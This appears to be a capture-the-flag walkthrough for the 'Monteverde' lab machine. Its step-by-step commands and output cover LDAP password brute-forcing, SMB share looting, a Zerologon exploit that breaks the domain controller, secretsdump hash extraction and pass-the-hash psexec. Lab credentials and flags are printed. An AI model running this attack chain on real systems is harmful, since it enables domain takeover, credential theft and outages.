Level: Medium
User Flag
Nmap scan
IP=10.10.10.172
nmap -T5 -v -Pn -n -sT -sC -sV -p 1-65535 --max-parallelism 10 $IP -oA nmap-tcp-allports-${IP}-$(date '+%Y.%m.%d.%Hh%M')# Nmap 7.92 scan initiated Mon May 30 14:55:55 2022 as: nmap -T5 -v -Pn -n -sT -sC -sV -p 1-65535 --max-parallelism 10 -oA nmap-tcp-allports-10.10.10.172-2022.05.30.14h55 10.10.10.172
Nmap scan report for 10.10.10.172
Host is up (0.026s latency).
Not shown: 65518 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-05-30 19:08:31Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open mc-nmf .NET Message Framing
49667/tcp open msrpc Microsoft Windows RPC
49673/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49674/tcp open msrpc Microsoft Windows RPC
49676/tcp open msrpc Microsoft Windows RPC
49693/tcp open msrpc Microsoft Windows RPC
Service Info: Host: MONTEVERDE; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2022-05-30T19:09:28
|_ start_date: N/A
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled and required
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon May 30 15:10:07 2022 -- 1 IP address (1 host up) scanned in 851.70 secondsWe find that port 445/139 for Samba and 389 for LDAP are open.
Enumerate Samba (unauthenticated)
rpcclient -N -U "" $IP
enumdomusers
enumdomgroupsuser:[Guest] rid:[0x1f5]
user:[AAD_987d7f2f57d2] rid:[0x450]
user:[mhope] rid:[0x641]
user:[SABatchJobs] rid:[0xa2a]
user:[svc-ata] rid:[0xa2b]
user:[svc-bexec] rid:[0xa2c]
user:[svc-netapp] rid:[0xa2d]
user:[dgalanos] rid:[0xa35]
user:[roleary] rid:[0xa36]
user:[smorgan] rid:[0xa37]
group:[Enterprise Read-only Domain Controllers] rid:[0x1f2]
group:[Domain Users] rid:[0x201]
group:[Domain Guests] rid:[0x202]
group:[Domain Computers] rid:[0x203]
group:[Group Policy Creator Owners] rid:[0x208]
group:[Cloneable Domain Controllers] rid:[0x20a]
group:[Protected Users] rid:[0x20d]
group:[DnsUpdateProxy] rid:[0x44e]
group:[Azure Admins] rid:[0xa29]
group:[File Server Admins] rid:[0xa2e]
group:[Call Recording Admins] rid:[0xa2f]
group:[Reception] rid:[0xa30]
group:[Operations] rid:[0xa31]
group:[Trading] rid:[0xa32]
group:[HelpDesk] rid:[0xa33]
group:[Developers] rid:[0xa34]Save the user names in a file.
users-rpcclient.txt
Guest
AAD_987d7f2f57d2
mhope
SABatchJobs
svc-ata
svc-bexec
svc-netapp
dgalanos
roleary
smorganBruteforce user passwords on LDAP
Try username = password.
hydra -L users-rpcclient.txt -P users-rpcclient.txt -t 1 $IP ldap2We find credentials: SABatchJobs / SABatchJobs
Enumerate Samba (authenticated)
DOMAIN=megabank.local
USER=SABatchJobs
PASS=SABatchJobs
smbclient -L $IP -U "${DOMAIN}/${USER}%${PASS}"Inspect content from all shares
smbclient \\\\$IP\\ADMIN$ -U "${DOMAIN}/${USER}%${PASS}"
smbclient \\\\$IP\\azure_uploads -U "${DOMAIN}/${USER}%${PASS}"
smbclient \\\\$IP\\C$ -U "${DOMAIN}/${USER}%${PASS}"
smbclient \\\\$IP\\E$ -U "${DOMAIN}/${USER}%${PASS}"
smbclient \\\\$IP\\IPC$ -U "${DOMAIN}/${USER}%${PASS}"
smbclient \\\\$IP\\NETLOGON -U "${DOMAIN}/${USER}%${PASS}"
smbclient \\\\$IP\\SYSVOL -U "${DOMAIN}/${USER}%${PASS}"
smbclient \\\\$IP\\users$ -U "${DOMAIN}/${USER}%${PASS}"Download content from the users$ share
smbclient \\\\$IP\\users$ -U "${DOMAIN}/${USER}%${PASS}" -Tc users.tar /
tar xvf users.tarcat mhope/azure.xmlWe find credentials: mhope / 4n0therD4y@n0th3r$
Connect with Evil-WinRM
evil-winrm -u mhope -p 4n0therD4y@n0th3r$ -i $IPFLAG: 4961976bd7d8f4eeb2ce3705e2f212f2
Root Flag
Check if the target is vulnerable to Zerologon
crackmapexec smb $IP -u $USER -p $PASS -d megabank.local -M zerologonThe target is vulnerable to Zerologon. Download the code and fix it: Zerologon (CVE-2020-1472).
DC_NAME=monteverde
DC_IP=10.10.10.1721. Check the DC – usually ~300 attempts, use the NETBIOS name not the FQDN:
python3 49071.py -do check -target $DC_NAME -ip $DC_IP2. Exploit the DC – this will break the DC until restored:
python3 49071.py -do exploit -target $DC_NAME -ip $DC_IP3. Dump the DC
For the Domain Admins hashes, this will not contain the machine hex-pass:
impacket-secretsdump -just-dc -no-pass ${DC_NAME}\$@${DC_IP} > secretdump.txtAdministrator:500:aad3b435b51404eeaad3b435b51404ee:100a42db8caea588a626d3a9378cd7ea:::
4. Dump the DC again
Use the Domain Admins hash to get the machines hex-pass. Look for the LM:NTLM hash of a domain administrator in previous dump. Need to know who is domain admin first (AD enum).
USER=Administrator
DOMAIN=megabank.local
grep $USER secretdump.txt
grep $USER secretdump.txt | cut -d ":" -f3,4impacket-secretsdump -no-pass -hashes aad3b435b51404eeaad3b435b51404ee:100a42db8caea588a626d3a9378cd7ea ${DOMAIN}/${USER}@${DC_IP} > secretdump_admin.txtimpacket-psexec -hashes aad3b435b51404eeaad3b435b51404ee:100a42db8caea588a626d3a9378cd7ea ${DOMAIN}/${USER}@${DC_IP}cd "C:\Users\Administrator\Desktop"
type root.txt
whoami && hostname && ipconfig /allFLAG: 12909612d25c8dcf6e5a07d1a804a0bc
cd "C:\Users\mhope\Desktop"
type user.txt
whoami && hostname && ipconfig /allFLAG: 4961976bd7d8f4eeb2ce3705e2f212f2